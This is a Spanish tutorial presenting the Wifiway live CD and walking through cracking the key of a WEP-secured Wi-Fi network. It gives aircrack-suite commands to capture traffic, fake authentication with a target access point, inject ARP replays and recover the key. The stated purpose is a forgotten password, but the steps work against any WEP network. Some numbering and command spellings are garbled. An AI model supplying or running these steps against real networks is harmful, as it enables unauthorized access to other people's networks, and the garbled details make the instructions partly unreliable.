Wifiway es un life cd de Linux pensado per conectarse en redes wifi con contraseña, la cual hemos olvidado.Lleva aplicaciones como airoway, airoscript.es (con las mejoras del Dlink decrypter y el wlandecrypter), airoipw2200.sh, ipwraw 2.0 (que permite wireless para las ipw3945 en la interface wifi) ...

Para conectarse en una red wifi con seguridad WEP se tiene que seguir los siguientes pasos:

1-Cuando arrancamos el CD nos pide la franja horaria y todo seguido el tipo de teclado, una vez seleccionado esto nos quedara en un consola donde poniendo la comanda "startx" entraremos en el entorno gráfico del sistema operativo.

2-Una vez hemos arrancado con el life CD y estamos en el sistema operativo, vamos al directorio "sys/class/net/wifi0/device" y modificamos el archivo "rate" y lo ponemos a 2.

2-Sin cerrar la ventana anterior abrimos una terminal y escribimos la comanda "iwconfig". Esta comanda nos permitirá ver los dispositivos wifi conectados a nuestro PC. Cogeremos, por ejemplo, el dispositivo "rtap0".

3-Seguidamente utilizaremos la comanda "airodump -ng rtap0", la cual nos permitirá ver todos los puntos de acceso. Si no detecta ningún punto de acceso vamos al directorio donde hemos ido antes y modificamos el archivo "channel" y probamos con los valores 5,6,9 y 11.

4-Una vez que en la terminal aparezca el AP(punto de acceso) que queramos desencriptar nos fijamos en su "BSSID"(MAC_ADRESS) y en su "ESSID"(Nombre), también en su encriptación (que sea WEP) .

5-Abrimos el archivo "bssid" y pegamos la MAC del AP al que queremos conectar, guardamos pero no cerramos, ya que a veces da error si cerramos.

6-Abrimos una terminal y escribimos el siguiente comando "airodump-ng -c 6 -w archivo rtap0" (airodump-ng -c CANAL_DEL_AP -w NOMBRE_DEL_ARCHIVO rtap0) , seguidamente se pondrá en modo monitor.

7-Levantamos la interfaz wifi0 poniendo en otra terminal: "ifconfig wifi0 up".

8-Para saber nuestra MAC utilizamos la comanda "ifconfig" en una terminal nueva, la MAC es la que aparece tras HWaddr, está formada de 12 dígitos (00:00:00:00:00:00).

9-Abrimos otra terminal, y escribimos "aireplay-ng -1 0 -a MAC_AP(la del punto de acceso) -h MAC_PC(la nuestra) -e ESSID(nombre_del_AP) wifi0", con eso atacaremos al AP, buscando paquetes que sirvan para saber la llave, de tipo arp. Deberá salir "authentification sucessful", en la terminal donde hemos ejecutado el airodump deberá aparecer bajo AUTH: OPN al lado del essid del AP.

10-Ahora inyectaremos abriendo otra terminal y escribiendo: "aireplay-ng -3 -b MAC_AP -h MAC_PC wifi0". En unos minutos deberían de empezar a subir los ARPs y los #data en el airodump(los paquetes recibidos que se van guardando en el archivo que nombramos antes en el directorio "root" con el nombre seguido de -01).

11-Si sale bien en unos minutos el archivo pesara más de 20Mb aproximadamente. Abrimos otra terminal y ejecutamos: "aircrack-ptw archivo-01.cap", si son suficientes paquetes en un par de segundos aparecerá la Clave: Found key with "método usado": CLAVE_DEL_AP...